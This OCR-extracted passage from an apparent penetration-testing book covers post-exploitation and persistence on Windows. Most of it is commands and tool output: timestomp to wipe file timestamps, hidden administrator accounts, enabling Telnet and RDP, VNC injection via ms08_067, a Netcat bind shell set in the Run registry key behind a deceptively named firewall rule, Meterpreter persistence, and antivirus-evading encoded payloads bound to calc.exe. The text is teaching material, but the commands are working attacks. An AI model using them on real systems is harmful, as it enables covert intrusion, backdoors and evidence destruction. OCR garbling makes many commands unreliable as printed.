Accessed, Created, and MFT Entry modified times of a file). Once a system has been 
compromised and a meterpreter shell established, timestomp can be invoked, as 
shown in the following screenshot: 



meterp refer > timestomp -h 



Usage: timestomp file_path OPTIONS 
OPTIONS: 



-a <opt> 
-b 

-c <opt> 
-e <opt> 
-f <opt> 
-h 

-m <opt> 
- r 
-v 

-z <opt> 



Set the "last accessed" time of the file 

Set the MACE timestamps so that EnCase shows blanks 

Set the "creation" time of the file 

Set the "mft entry modified" time of the file 

Set the MACE of attributes equal to the supplied file 

Help banner 

Set the "last written" time of the file 

Set the MACE timestamps recursively on a directory 

Display the UTC MACE values of the file 

Set all four attributes (MACE) of the file 



[ 144 ] 




Chapter 5 



For example, c : of the compromised system contains a file named readme . txt. 
The MACE values for this file indicate that it was created recently, as shown in the 
following screenshot: 

meterp reter > timestomp README.txt -v 
Modified : 2013-09-16 03:25:15 -0400 

Accessed : 2013-09-16 07:04:16 -O40O 

Created : 2013-09-16 07:04:16 -0400 

Entry Modified: 2S13-Q9-16 07:04:47 -0400 



If we want to hide this file, we may move it to a cluttered directory, such as 
windows\system3 2. However, the file would be obvious to anyone who sorted the 
contents of that directory on the basis of the creation dates or another MAC-based 
variable. Therefore, to copy the MAC information from the cmd . exe file to the 
readme . txt file, use the following command: 

meterpreter>timestomp README.txt -f 
C : \\WINDOWS\system32\cmd.exe 

We can also choose to blank out the MAC data using the -b switch. As you can see 
in the following screenshot, we have chosen to change the MAC data to a time in the 
future (the year 210 6). 

meterp reter > timestomp README.txt -v 
Modified : 2013-09-16 03:25:15 -0400 

Accessed : 2013-09-16 07:04:16 -0400 

Created : 2013-09-16 07:04:16 -0400 

Entry Modified: 2013-09-16 07:04:47 -0400 
meterp reter > timestomp README.txt -b 
[*] Blanking file MACE attributes on README.txt 
meterp reter > timestomp README.txt -v 
Modified : 2106-02-07 01:28:15 -0500 

Accessed : 2106-02-07 01:28:15 -0500 

Created : 2106-02-07 01:28:15 -0500 

Entry Modified: 2106 -02-0 7 01:28:15 -0500 
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Such a change will attract the attention of an investigator, but they will not be able to 
use the data for a forensic analysis. What do the attributes look like from the original 
Windows platform? If the system administrator calls the system properties of a file, 
the creation and modification dates have been changed back to the year 1601 (the 
date used by Microsoft as the initial system start time). In contrast, the last accessed 
time for the file remains accurate. You can see this in the following screenshot: 



README.txt Properties 



General 



Summary 





README.txt 



Type of file: 


Text Document 




Opens with: 


Notepad 


Change... 


Location: 


C:\ 




Size: 


8.41 KB (8,614 bytes) 




Size on disk: 


12.0 KB (12,288 bytes) 




Created: 


Monday, January 01, 1601, 


12:00:00 AM 


Modified: 


Monday, January 01, 1601, 


12:00:00 AM 


Accessed: 


Today, September 16, 2013, 6:46:43 AM 



Although this is expected behavior, it still provides clues to an investigator. In order 
to completely foul up an investigation, an attacker may recursively change all of the 
set times in a directory or on a particular drive using the following command: 

meterpreter>timestompC : \\ -r 

The solution is not perfect. It is very obvious that an attack has occurred. 
Furthermore, it is possible for timestamps to be retained in other locations on a hard 
drive and be accessible for investigation. If the target system is actively monitoring 
changes to system integrity using an intrusion detection system, such as Tripwire, 
alerts of the timestomp activity will be generated. Therefore, destroying timestamps 
is of limited value when a stealthy approach is truly required. 
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Summary 

In this chapter, we focused on the immediate actions that follow exploitation of a 
target system. We reviewed the initial rapid assessment conducted to characterize 
the server and the local environment. We also learned how to identify and locate 
target files of interest, create user accounts, perform vertical escalation to improve 
access privileges, and remove signs of an intrusion. 

In the next chapter, we will learn how to implement a persistent backdoor to retain 
access, and we will learn techniques to support covert communications with the 
compromised system. 
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The final stage of the attacker's kill chain is the "command, control, and 
communicate" phase, where the attacker relies on a persistent connection with the 
compromised system to ensure that they can continue to maintain their control. 

To be effective, the attacker must be able to maintain interactive persistence — they 
must have a two-way communication channel with the exploited system (interactive) 
that remains on the compromised system for a long period of time without being 
discovered (persistence). This type of connectivity is a requirement because of the 
following reasons: 

• Network intrusions may be detected, and the compromised systems may be 
identified and patched 

• Some exploits only work once because the vulnerability is intermittent, 
exploitation causes the system to fail, or because exploit forces the system 
to change, rendering the vulnerability unusable 

• Attackers may need to return multiple times to the same target for 
various reasons 

• The target's usefulness is not always immediately known at the time 
it is compromised 

The tool used to maintain interactive persistence is usually referred to by classical 
terms such as backdoor or rootkit. However, the trend towards long-term 
persistence by both automated malware and human attacks has blurred the meaning 
of traditional labels; so instead, we will refer to malicious software that is intended 
to stay on the compromised system for a long period of time as persistent agents. 

These persistent agents perform many functions for attackers and penetration testers, 
including the following: 

• Allow additional tools to be uploaded to support new attacks, especially 
against systems located on the same network. 

• Facilitate the exfiltration of data from compromised systems and networks. 
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• Allow attackers to reconnect to a compromised system, usually via an 
encrypted channel to avoid detection. Persistent agents have been known to 
remain on systems for more than a year. 

• Employ antiforensic techniques to avoid being detected, including hiding in 
the target's filesystem or system memory, using strong authentication, and 
using encryption. 

In this chapter you will learn about the following: 

• Compromising existing system and application files for remote access 

• Creating persistent agents 

• Maintaining persistence with the Metasploit Framework 

• Redirecting ports to bypass network controls 

Compromising the existing system and 
application files for remote access 

The best persistent agent is one that does not need to be hidden because it is part of 
the existing file structure of the compromised system; the attacker only has to add 
certain functionality to convert regular system files and applications into persistent 
agents. This approach can almost never be detected by security controls such as 
intrusion detection systems. 

Remotely enabling the Telnet service 

One technique used to maintain remote access is to use the Metasploit Framework to 
enable the Telnet service on a Windows platform and use it to provide persistence. 

The first step is to compromise the target system to obtain a meterpreter session 
(migrate the session to ensure a stable shell) and then elevate access privileges. 
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Next, obtain a local command shell to access the target system using the 
following command: 

meterpreter> execute -H -f cmd -i 
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When executed, this command creates an interactive command shell (- i) that acts 
as a hidden process (-h). 

Using the command prompt of the shell, create a new user account. When 
creating user accounts to ensure persistence, many attackers use the following 
two-part strategy: 

• Create an account with a name that will attract attention if the compromise is 
investigated (for example, Leet7737) 

• Create an account that appears to be part of normal system functions, such as 
Service_Account, using the following commands: 

C:\net user Service_Account password /ADD 

C:\net localgroup administrators Service_Account /ADD 

When the new user accounts have been created, exit the Windows command shell. 

To enable Telnet, run the following command from the meterpreter prompt: 

run gettelnet -e 

The execution of the previous command is shown in the following screenshot: 

meterp reter > run gettelnet -e 

[*] Windows Telnet Server Enabler Meterpreter Script 
[*] Setting Telnet Server Services service startup mode 

The Telnet Server Services service is not set to auto, changing it to au 

to ... 

Opening port in local firewall if necessary 
[*] For cleanup use command: run multi_console_command - rc /root/ .msf4/logs/sc ri 
pt s/get tel net /cl ean_up 2G13092G .2039 . rc 
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The script shown in the previous screenshot creates a persistent Telnet service on 
the compromised system. To access it, connect to the system's IP address using the 
Telnet protocol and provide the username and password that were used to create the 
account, as shown in the following screenshot: 

root@kali: # telnet 192.168.43.128 
Trying 192.168.43.128. . . 

Connected to 192.168.43.128. 

Escape character is 1 A ] 1 . 

Welcome to Microsoft Telnet Service 

login: Service_Account 
password : 



^ ================================== 

Welcome to Microsoft Telnet Server. 



: + : ==========================================: 

C:\Documents and Settings\Service_Account>| 



The Telnet service will persist until it is removed. Unfortunately, there are some 
limitations to using Telnet: it is readily detectable (especially because credentials 
are transmitted in the clear) and it functions only in the command-line mode. 

However, what if you need to have a GUI to access certain applications on the 
compromised system? 

Remotely enabling Windows Terminal 
Services 

One of the most reliable techniques to ensure remote access is to persistently enable 
Windows Terminal Services, also known as the Remote Desktop Protocol (RDP). 
To do so, you must have administrator privileges and know the version of the 
target's operating system. 

For example, if the target is Windows 7, use meterpreter to obtain an interactive 
command shell on the target, and then enter the following commands to change 
the registry: 

C:\ reg add "hklm\system\currentControlSet\Control\Terminal 
Server" /v "AllowTSConnections" /t REG_DWORD /d Oxl /f 

C:\reg add "hklm\system\currentControlSet\Control\Terminal 
Server" /v " fDenyTSConnections" /t REG_DWORD /d 0x0 /f 
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To ensure that RDP will pass through the client-side firewall, add a rule using the 
following command: 

C:\ netshadvf irewall firewall set rule group=" remote desktop" 
new enable=Yes 

Now we can start the RDP service using the following command: 

C:\net start Termservice 

The change launch RDP is not yet persistent; use the following command to start 
RDP each time the computer is started: 

C:\sc conf igTermService start= auto 

The process of enabling RDP is not too complex, but it is one that should be scripted 
to reduce the possibility of errors, especially when working with the system registry. 
Fortunately, the meterpreter framework uses the getgui script to automatically 
enable RDP services. 

When run from the meterpreter prompt, the command line shown in the following 
screenshot creates the account's username and password, hides the account from the 
log-in screen, and makes the necessary changes to the registry to remain persistent. 
The following screenshot shows the command used to create a username that 
appears to be a legitimate account (Service Account) with a simple password. 

meterpreter > run getgui -u Service_Account -p pa$$word 

[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator 
[*] Carlos Perez carlos_perez@darkoperator .com 
[*] Setting user account for logon 

Adding User: Se rvice_Account with Password: pa$$word 
Hiding user from Windows Login screen 

Adding User: Service_Account to local group 'Remote Desktop Users' 

Adding User: Se rvice_Account to local group 'Administrators' 

[*] You can now login with the created user 

[*] For cleanup use command: run multi_console_command - rc /root/ .msf 4/logs/sc ri 
pts/getgui/cleanjjp 20130920 . 1313 . rc 



To connect to the compromised remote desktop, use Kali's rdesktop program. 
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Remotely enabling Virtual Network Computing 

If the system contains applications that are known to be compromised (especially 
remote-access programs), it may be possible to take advantage of the existing 
vulnerabilities to exploit the system. For example: 

• It may be possible to extract remote-access passwords for some programs 
from the registry. VNC stores passwords in the registry, and these can 
be obtained by manually extracting the registry key or by uploading and 
executing an application such as NirSoft's VNCPassView. 

• Different versions of VNC contain different vulnerabilities that can be 
exploited to compromise the application and gain remote access to the 
system. If the user has a current version installed, it may be possible to 
uninstall that version and install an older version in its place. Due to the 
similarity of functionality among the versions, the user may not notice the 
substitution, but an attacker can use the the authentication bypass exploits 
found in older VNC versions to maintain access in the post-compromise phase. 

Metasploit comes with the ability to introduce VNC directly to an exploited system 
using the VNCINJECT module. 

In the following screenshot, VNC was selected as the payload instead of the regular 
reverse_TCP shell: 

msf > use windows/smb/ms08_067_netapi 

msf exploit (ms08_067_netapi) > set PAYLOAD windows/vncinj ect/bind_tcp 

PAYLOAD => windows/vncinj ect/bind_tcp 

msf exploit (ms08_067_netapi) > set RHOST 192.168.43.128 

RHOST => 192.168.43.128 

msf exploit (ms08_067_netapi) > exploit 



[*] Started bind handler 

[*] Automatically detecting the target... 



Fingerprint: Windows XP - Service 
[ :t ] Selected Target: Windows XP SP3 E: 
[*] Attempting to trigger the vulner£ 
[ :f ] Sending stage (445440 bytes) to 1 
[*] Starting local TCP relay on 127.0 


TightVNC: rwbeggs-le69067 










*■■■ Metasploit Courtesy Shell (TM) 


■ 


[*] Local TCP relay started. 

[*] Launched vnc viewer. 

Session 1 created in the backgrou 
msf exploit (ms08 067 netapi) > Conned^ 

.8 

Enabling TightVNC protocol extensions 
No authentication needed 
Authentication successful 


Microsoft Windows- XP [Version 5.1 
<C> Copyright 1985-2001 Microsoft 

C : SUI ND0US\system32 > 

it 


.2600] 

Corp. 




Desktop name 11 rwbeqqs-le69067" 
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This attack does not require any authentication. If you're testing a client site, ensure 
that all vulnerable applications are removed from the compromised system once the 
vulnerability has been proved — otherwise, you've created an access point that can be 
found and used by any other attacker! 

Using persistent agents 

Traditionally, attackers would place a backdoor on a compromised system — if the 
front door provided authorized access to legitimate users, the backdoor applications 
allowed attackers to return to an exploited system and access to services and data. 

Unfortunately, the classical backdoors provided limited interactivity and were not 
designed to be persistent on the compromised systems for very long time frames. This 
was viewed as a significant shortcoming by the attacker community, because once the 
backdoor was discovered and removed, there was additional work required to repeat 
the compromise steps and exploit the system, which was made more difficult by the 
forewarned system administrators defending the network and its resources. 

Kali now focuses on persistent agents that if properly employed, are more difficult to 
detect. The first tool we will review is the venerable Netcat. 

Employing Netcat as a persistent agent 

Netcat is an application that supports reading from and writing to network 
connections using "raw" TCP and UDP packets. Unlike packets that are organized by 
services such as Telnet or FTP, Netcat's packets are not accompanied by headers or 
other channel information specific to the service. This simplifies communications and 
allows for an almost-universal communication channel. 

The last stable version of Netcat was released by Hobbit in 1996, and it has remained 
as useful as ever; in fact, it is frequently referred to as the TCP/IP Swiss army knife. 
Netcat can perform many functions, including the following: 

• Port scanning 

• Banner grabbing to identify services 

• Port redirection and proxying 

• File transfer and chatting, including support for data forensics 
and remote backups 

• Use as a backdoor or an interactive persistent agent, on a 
compromised system 
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At this point, we will focus on using Netcat to create a persistent shell on a 
compromised system. Although the following example uses Windows as the 
target platform, it functions the same when used on a Unix-based platform. 

In the example shown in the following screenshot, we will retain the executable's 
name — nc . exe; however, it is common to rename it prior to use in order to minimize 
detection. Even if it is renamed, it will usually be identified by antivirus software; 
many attackers will alter or remove elements of Netcat's source code that are not 
required and recompile it prior to use; such changes can alter the specific signature 
that antivirus programs use to identify the application as Netcat, making it invisible 
to antivirus programs. 

Netcat is stored on Kali in the /usr/share/windows-binaries repository. 

To upload it to a compromised system, enter the following command from 
within meterpreter: 

meterpreter> upload/usr/share/windows-binaries/nc . exe 
C : \\WINDOWS\\system32 

The execution of the previous command is shown in the following screenshot: 

meterp reter > upload /us r/sha rs/windows -bina ries/nc . exe c :\\WINDGWS\\system32 
[*] uploading : /us r/sha re/windows -bina ries/nc .exe -> c:\WINDGWS\system32 
[*] uploaded : /us r/sha re/windows -bina ries/nc .exe -> c:\WIND0WS\system32\nc.ex 
e 



You do not have to place it in the system3 2 folder specifically; however, due to 
the number and diversity of filetypes in this folder, this is the best location to hide a 
file in a compromised system. 

While conducting a penetration test on one client, we identified six 
separate instances of Netcat on one server. Netcat had been installed 
twice by two separate system administrators to support network 
management; the other four instances were installed by external attackers 
and were not identified until the penetration test. Therefore, always look 
to see whether or not a Netcat is already installed on your target! 

If you do not have a meterpreter connection, you can use Trivial File Transfer 
Protocol (TFTP) to transfer the file. 

Next, configure the registry to launch Netcat when the system starts up and ensure 
that it is listening on port 444 (or any other port that you have selected, as long as it 
is not in use) using the following command: 
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meterpreter>reg setval -k 

HKLM\\sof tware\\microsof t\\windows\\currentversion\\run -vv nc 
-d 1 C : \\windows\\system32\\nc . exe -Ldp 444 -e cmd.exe' 

Confirm that the change in the registry was successfully implemented using the 
following queryval command: 

meterpreter>reg queryval -k 

HKLM\\sof tware\\microsof t\\windows\\currentverion\\run -vv nc 

Using the netsh command, open a port on the local firewall to ensure that the 
compromised system will accept remote connections to Netcat. It is important 
to know the target's operating system. The netsh advfirewall firewall 
command-line context is used for Windows Vista, and Windows Server 2008 and 
later versions; the netsh firewall command is used for earlier operating systems. 

To add a port to the local Windows firewall, enter the shell command at the 
meterpreter prompt and then enter rule using the appropriate command. 

When naming the rule, use a name such as svchostpassthrough that suggests 
that rule is important for the proper functioning of the system. A sample 
command is shown as follows: 

C: \Windows\system32>netsh firewall add portopening TCP 444 
"service passthrough" 

Confirm that the change was successfully implemented using the following command: 

C : \windows\system32>netsh firewall show portopening 

The execution of the previously mentioned commands is shown in the 
following screenshot: 

meterp reter > shell 
Process 1016 created. 

Channel 3 created. 

Microsoft Windows XP [Version 5.1. 2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C :\WIND0WS\system32>netsh firewall add portopening TCP 444 "svchost passthrough" 
netsh firewall add portopening TCP 444 "svchost passthrough" 

Ok. 



C :\WIND0WS\system32>netsh firewall show port opening 
netsh firewall show portopening 

Port configuration for Standard profile: 

Port Protocol Mode Name 



444 TCP Enable svchost passthrough 
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When the port rule is confirmed, ensure that the reboot option works. 

• Enter the following command from the meterpreter prompt: 
meterpreter> reboot 

• Enter the following command from an interactive Windows shell: 

C : \windows\system32>shutdown -r -t 00 

To remotely access the compromised system, type nc at a command prompt, indicate 
the verbosity of the connection (- v reports basic information and -w reports much 
more information), and then enter the IP address of the target and the port number, 
as shown in the following screenshot: 

root@kali: # nc -v 192.168.43.128 444 

192.168.43.128: inverse host lookup failed: Unknown server error : Connection ti 
med out 

(UNKNOWN) [192.168.43.128] 444 (snpp) open 
Microsoft Windows XP [Version 5 . 1 .2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\DigitalDefence>| 



Unfortunately, there are some limitations to using Netcat — there is no authentication 
or encryption of transmitted data, and it is detected by nearly all antivirus software. 

The lack of encryption can be resolved using cryptcat, a Netcat variant that uses the 
Twofish encryption to secure data during transmission between the exploited host 
and the attacker. Twofish encryption, developed by Bruce Schneier, is an advanced 
symmetric block cipher that provides reasonably strong protection for encrypted data. 

To use cryptcat, ensure that there is a listener ready and configured with a strong 
password, using the following command: 

root@kali:~# cryptcat -k password -1 -p 444 

Next, upload cryptcat to the compromised system and configure it to connect with 
the listener's IP address using the following command: 

C:\cryptcat -k password <listener IP address> 444 
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Unfortunately, Netcat and its variants remain detectable by most antivirus 
applications. It is possible to render Netcat undetectable using a hex editor to alter the 
source code of Netcat; this will help avoid triggering the signature matching action of 
the antivirus, but this can be a long trial-and-error process. A more efficient approach 
is to take advantage of the Metasploit Framework's persistence mechanisms. 

Maintaining persistence with the 
Metasploit Framework 

Metasploit' s meterpreter contains several scripts that support persistence on a 
compromised system. We will examine two script options for placing a backdoor 
on a compromised system: metsvc and persistence. 

Using the metsvc script 

The metsvc script is a network service wrapper for meterpreter that allows it to 
either be used as a Windows service or run as a command-line application. It is 
typically used as a backdoor to maintain communications with a compromised system. 

To use metsvc, first compromise the system and then migrate meterpreter to the 
explorer . exe process to obtain a more stable shell. 

Execute the metsvc agent by invoking the run command, as shown in the following 
screenshot. As you can see, it creates a temporary installation directory, uploads three 
files (metsrv.dll, metsvc -server . exe, and metsvc . exe), and then starts metsvc. 

meterp reter > run metsvc 

[*] Creating a meterpreter service on port 31337 

Creating a temporary installation directory C:\DQCUME~l\DIGITA~l\LQCALS~l\Te 
mp\Cvj rsZWOMK . . . 

[*] » Uploading metsrv.dll... 

[*] » Uploading metsvc -server .exe . . . 

[*] » Uploading metsvc.exe... 

[*] Starting the service... 

* Installing service metsvc 
* Starting service 

Service metsvc successfully installed. 
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To interact with the persistent metsvc agent, the attacker opens the Metasploit 
Framework and selects use exploit/multi/handler with the payload windows/ 
metsvc bind tcp, as shown in the following screenshot. The other parameters 
(IP address and port) are also set. 



msf > use exploit/multi/handler 

msf exploit (handler) > set PAYLOAD windows/metsvc_bind_tcp 
PAYLOAD => windows/metsvc_bind_tcp 
msf exploit (handler) > set LPORT 31337 
LPORT => 31337 

msf exploit (handler) > set RHOST 192.168.43.128 

RHOST => 192.168.43.128 

msf exploit (handler) > show options 

Module options (exploit/multi/handler) : 

Name Current Setting Required Description 



Payload options (windows/metsvc_bind_tcp) : 



Name 


Current Setting 


Required 


Desc ription 


EXITFUNC 


process 


yes 


Exit technique: seh, thread, process, no 


LPORT 


31337 


yes 


The listen port 


RHOST 


192.168.43.128 


no 


The target address 



Exploit target: 

Id Name 

0 Wildcard Target 



When the exploit command is executed, a session is opened directly between the 
two systems, allowing for the escalation of privileges and other functions to occur 
from the meterpreter command line. The execution of the exploit command is 
shown in the following screenshot: 

msf exploit (handler) > exploit 

[*] Starting the payload handler. . . 

[*] Started bind handler 

[*] Meterpreter session 1 opened (192.168.43.130:44930 -> 192.168.43.128:31337) at 2013 
-09-18 15:50:45 -0400 

meterpreter > pwd 

C:\WINDQWS\system32 

meterp refer > getuid 

Server username: NT AUTHORITYX SYSTEM 
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The met svc script requires no authentication; once the agent is in place, it can be 
used by anyone to gain access to the compromised system. Most attackers would 
not use this without altering the source code such that it requires authentication or 
ensuring that there is some method in place to filter out remote connections. 

More importantly, it is not a stealthy attack. Any attempt to list running processes, 
such as entering the ps command from the meterpreter prompt, will identify 
the met svc service and the fact that the executable is running from a Temp 
directory — which is very suspicious! In the following screenshot, the directory with 
the random name (CvjrsZWOMK) located in the Temp folder is an obvious flag that 
a system has been compromised: 

1832 1660 wscript.exe x86 G RWBEGGS-lE69G67\DigitaTDefence 

C : \WIND0WS\System32\WSc ript . exe 

1988 672 metsvc.exe x86 G NT AUTHORITY\SYSTEM 

C:\DGCUME~l\DIGITA~l\LOCALS~l\Temp\Cvj rsZWOMK\met svc.exe 



A simple inspection of the Temp folder will identify the three hostile files, as shown 
in the following screenshot; however, these will usually be flagged by an antivirus 
before they are found by manual inspection. 



Address ED C:\Documents and 5ettings\DigitalDefence\Local 5ettings\Temp\CvjrsZWOMK 
Folders x 

El C Documents and Settings a 

+ l£) Administrator 
(±1 C All Users 
El C Default User 
S (Si DigitalDefence 
I C Application Data 
ED Cookies 
+ £) DeskJtop 
® & Favorites 
- Q Local Settings 

t± & Application Data 
© ®] History 
0 Temp 

d 



CvjrsZWOMK 





metsrv.dll 


r 


| metsvc.exe 






| metsvc-server.exe 





Using the persistence script 

A more effective approach for gaining persistence is to use the meterpreter 
prompt's persistence script. 

After a system has been exploited and the migrate command has moved the initial 
shell to a more secure service, an attacker can invoke the persistence script from 
the meterpreter prompt. 
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Using -h in the command will identify the available options for creating a persistent 
backdoor, as shown in the following screenshot: 



meterp reter > run persistence -h 

Meterpreter Script for creating a persistent backdoor on a target host. 



OPTIONS: 



-A 

nt 

-L <opt> 
will be used . 
-P <opt> 
-S 

ivileges) 

-T <opt> 

-U 

-X 

-h 

-i <opt> 
-p <opt> 

- r <opt> 

back 



Automatically start a matching multi/handler to connect to the age 

Location in target host where to write payload to, if none %TEMP% 

Payload to use, default is windows/mete rp rete r/ reve rse_tcp . 
Automatically start the agent on boot as a service (with SYSTEM pr 

Alternate executable template to use 
Automatically start the agent when the User logs on 
Automatically start the agent when the system boots 
This help menu 

The interval in seconds between each connection attempt 

The port on the remote host where Metasploit is listening 

The IP of the system running Metasploit listening for the connect 



In the example shown in the following screenshot, we have configured persistence 
to run automatically when the system boots and to attempt to connect to our listener 
every 10 seconds. The listener is identified as the remote system (-r) with a specific 
IP address and port. Additionally, we could elect to use the -u option, which will 
start persistence when a user logs onto the system. 

meterp reter > run persistence -X -i 10 -p 444 -r 192.168.43.128 
Running Persist ance Script 

Resource file for cleanup created at /root/ .msf4/logs/persistence/RWBEGGS-lE 
69067_20130918 . 1449/RWBEGGS-1E69067_20130918 . 1449 . rc 

Creating Payload^indows/meterp reter/ reve rse_tcp LHQST=192 . 168 .43 . 128 LP0RT= 

444 

[*] Persistent agent script is 611035 bytes long 

Persistent Script written to C:\WIMDQWS\TEMP\eRCqtxBufilTB.vbs 
[ + Executing script C:\WINDOWS\TEMP\eRCqtxBufilTB.vbs 
[+] Agent executed with PID 1360 

Installing into autorun as HKLMXSoftwa re\Mic rosoft\Windows\CurrentVersion\Ru 
nXYTpKAlna 

[+] Installed into autorun as HKLM\Software\Mic rosoft\Windows\CurrentVersion\Run 
\YTpKAlna 



[ Note that we have arbitrarily selected port 444 for use by persistence; an 
attacker must verify the local firewall settings to ensure that this port is 
open, or use the reg command to open the port. Like most Metasploit 
modules, any port can be selected as long as it is not already in use. 
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The persistence script places a VBS file in a temporary directory; however, you can 
use the -l option to specify a different location. The script also adds that file to the 
local autorun sections of the registry. 

Because the persistence script is not authenticated and anyone can use it to access 
the compromised system, it should be removed from the system as soon as possible 
after the discovery or completion of penetration testing. To remove the script, 
confirm the location of the resource file for cleanup, and then execute the following 
resource command: 

meterpreter> run multi_console_command -rc 
/root/ .msf 4 /logs/per sis tence/RWBEGGS- 

1E69067_20130920 . 0024/RWBEGGS-lE69067_20130920 . 0024 . rc 

Creating a standalone persistent agent 
with Metasploit 

The Metasploit Framework can be used to create a stand-alone executable that 
can persist on a compromised system and allow interactive communications. 

The advantage of a stand-alone package is that it can be prepared and tested in 
advance to ensure connectivity and encoded to bypass local antivirus software. 

To make a simple stand-alone agent, launch msf console on a command prompt 
in Kali. 

Use msfpayload to craft the persistence agent. In the example shown in the 
following screenshot, the agent is configured to use a reverse_tcp shell that 
will connect to the local host at 192. 168. 43. 130 on port 4444. The agent, 
named attacki . exe, will use a Win32 executable template. 

msf > msfpayload windows/mete rpreter/reverse_tcp LH0ST=192 . 168 .43 . 13G LP0RT=4444 
x > /root/Desktop/attackl .exe 

[ + ] exec: msfpayload windows/meterpreter/reverse_tcp LH0ST=192 . 168 .43 . 13G LPQRT= 
4444 x > /root/Desktop/attackl .exe 

Created by msfpayload (http://www.metasploit.com). 

Payload : windows/met erp ret er/reverse_tcp 
Length: 29G 

Options: { l, LHQST' , => , '192 . 168 .43 . 13S M f "LP0RT I, => ,I 4444 11 } 



The stand-alone agent will only work on compromised systems with no antivirus 
installed, or if the antivirus has first been disabled using the appropriate 
meterpreter command. To bypass the antivirus, the backdoor must be encoded. 



[ 163 ] 



Post Exploit - Persistence 



There are several different options for encoding the payload, as shown in the 
following screenshot: 



Usage: /opt/metasploit/apps/pro/msf3/msfencode <options> 
OPTIONS: 



<opt> 



-a <opt> 
-b <opt> 
-c <opt> 
-d <opt> 
-e <opt> 
-h 
-i 
-k 
-1 
-m 
-n 
-o 

-P 
-s 
-t 



<opt> 

<opt> 
<opt> 
copt> 
<opt> 
G,j ava, python 
mall ,exe-only 
-v 

-x <opt> 



The architecture to encode as 

The list of characters to avoid: '\xO0\xff 1 

The number of times to encode the data 

Specify the directory in which to took for EXE templates 
The encoder to use 
Help banner 

Encode the contents of the supplied file path 

Keep template working; run payload in new thread (use with -x) 

List available encoders 

Specifies an additional module search path 

Dump encoder information 

The output file 

The platform to encode for 

The maximum size of the encoded data 

The output format: raw, ruby , rb, perl , pi , bash, sh,c ,csharp,j s_be,j sJL 
r py , powe rshell , psl , vbsc ript , vbapplication , dll , exe , exe -se rvice , exe -s 
,elf , macho, vba, vba-exe, vbs,loop-vbs,asp,aspx,war,psh,psh-net 
Increase verbosity 

Specify an alternate executable template 



To see the available options, use the show encoders command. 

Metasploit uses approximately 30 different encoders; by default, it will select the 
most appropriate encoder if one is not specified. 

A good general encoder to use is shikata_ga_nai. This encoder implements 
polymorphic XOR additive feedback encoding against a 4-byte key, and it is the 
only encoder ranked as "excellent" by Metasploit. 

To encode the previously prepared attack . exe agent, we use the following 
command: 

msf>msf encode -i attack.exe -o encoded_attack.exe -e 
x86/shikata_ga nai -c 5 -t exe 

This encodes the attack.exe agent five times using the shikata_ga_nai protocol. 
Each time it is re-encoded, it becomes more difficult to detect. However, the 
executable also increases in size. 
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The full payload can be created directly from the command line in Kali. Not only can 
it be encoded, but we can configure the encoding pattern to avoid certain characters. 
For example, the following characters should be avoided when encoding a persistent 
agent because they may result in discovery and failure of the attack: 

• \x0 o represents a 0-byte address 

• \xaO represents a line feed 

• \xad represents a carriage return 

To create a multiencoded payload, use the following command: 

ms f >ms f payload windows/meterpreter/bind_tcp 

LPORT=444 R| msfencode -e x86/shikata_ga_nai -c 5 -t raw -a 
x86 -b ' \x00\x0a\x0d 1 -c 5 -x /root/Desktop/attack . exe -o 
/root/Desktop/encoded_attack . exe 

You can also encode msfpayload to an existing executable, and both the modified 
executable and the persistent agent will function. To bind the persistent agent to an 
executable such as a calculator (calc . exe), first copy the appropriate calc . exe file 
into Metasploit's template folder located at /usr/share/metasploit- framework/ 
data/templates. When the template is in place, use the following command: 

msf >msf pay load windows /me terpreter/bindtcp 

LPORT=444 R | msfencode -t exe -x calc.exe -k -o 
encoded_calc_attack.exe -e x86/shikata_ga_nai -c 5 

The agent can be placed on the target system, renamed calc . exe to replace the 
original calculator, and then executed. 

Unfortunately, nearly all Metasploit-encoded executables can be detected by 
client antivirus software. This has been attributed to penetration testers who have 
submitted encrypted payloads to sites such as VirusTotal (www. virustotal . com). 
However, you can create an executable and then encrypt it using Veil-Evasion, as 
described in Chapter 4, Exploit. 

Redirecting ports to bypass network 
controls 

Thus far, we've examined remote control access to the exploited system as if we have 
a direct connection between the victim and the attacker's machines; however, such 
connectivity is frequently controlled or blocked by network devices such as a firewall. 
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Attackers can circumvent these controls using port redirection, which is a designated 
system that listens on defined ports and forwards the raw packets to a specific 
secondary location. 

Kali provides several tools that support port redirection, including nc, cryptcat, 
socat, ssh, fpipe, and Metasploit's meterpreter; we'll look at some examples in 
the following sections. 

Example 1 - simple port redirection 

Simple port redirection may be used, for example, if you have compromised a 
system on the exterior of the network in the Demilitarized Zone (DMZ) and need 
to be able to communicate with an internal system from a remote location. 

On the compromised system in the DMZ, configure an instance of Netcat to listen to 
incoming commands and forward them to the target using the following command: 

root@kali:~# nc -1 -p 44444 -e <TAGET IP> 444 

This command will invoke Netcat (nc) to listen (-1) to incoming traffic, and execute 
(-e) the transfer of this incoming traffic to the target on port 444. Ports are not fixed 
and they do not have to be the same on both the listening/ forwarding host and the 
final target. 

If you lack complete information regarding the target's internal network, you may 
try the following command: 

root@kali:~# nc -1 -p <local listening port> -c "nc < TARGET IP> 

<TARGET port> 

This command sets the local (attacker) instance of Netcat to listen (- 1) on a 
designated port, and then instructs Netcat to create a new process with each 
new connection (-c). 

This simple example allows the outsider to connect to the direct network; however, 
it does not permit a bidirectional data connection, which is required for some tools. 



[ 166 ] 




Chapter 6 



Example 2 - bidirectional port redirection 

Consider three separate Windows data systems: 

[Attacker] | [Forwarder ] | [Target] 

In order to enable a bidirectional communications channel using Netcat, we will 
have to use named pipes. A named pipe, also referred to as FIFO, is a means of 
creating defined interprocess communication; this allows us to handle it as an object, 
making it easier to manage when issuing commands. In the following sample attack, 
we create a named pipe called reverse to handle bidirectional communications. 

The Attacker has an instance of Netcat on his local system set to listen on port 6 6 61 
using the following command: 

nc -1 6661 

The Forwarder, a compromised box with an instance of Netcat installed, will listen 
for incoming packets and forward them to the target; it is configured to listen on port 
6 6 6 6 using the following command: 

nc - 1 6666 

On the target system, enter the following command to create the named pipe: 
mkfifo reverse 

Then, configure a local instance of Netcat to use that named pipe to establish 
two-way communications across the forwarding system to the Attacker using the 
following command: 

nc localhost 6661 0<reverse | nc localhost 6666 l>reverse 

The same bidirectional data flow can be achieved using socat, which is designed 
to implement connections of this type. The command for this example would be 
executed from the target system and use: 

socat tcp : localhost : 6661 tcp : localhost : 6646 
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Summary 

